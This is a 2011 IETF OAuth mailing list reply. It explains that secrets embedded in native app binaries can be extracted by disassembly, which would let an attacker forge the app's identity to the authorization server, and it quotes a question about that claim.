The group is operating under the assumption that most native apps are publicly deployed or that copies of the app bundle/binary can at least be obtained by a malicious party. Whether and open system or a high protected system like Playstation 3 its always possible for the attacker to disassemble the program and obtain the secret. The secret is the key to an app proving its identity, so as soon as an attacker obtains the secret it can forge the identity of an app in so far as the OAuth auth server is concerned.
On Jun 1, 2011, at 7:17 PM, Dave Nelson wrote: >> Most native apps will be forgeable ... > > I don't understand the rationale behind this assertion. Would you > please point me to the discussion that elaborates on this point. > Thanks! > > Regards, > > Dave > > David B. Nelson > Sr. Software Architect > Elbrys Networks, Inc. > www.elbrys.com > +1.603.570.2636 _______________________________________________ OAuth mailing list OAuth@ietf.org https://www.ietf.org/mailman/listinfo/oauth
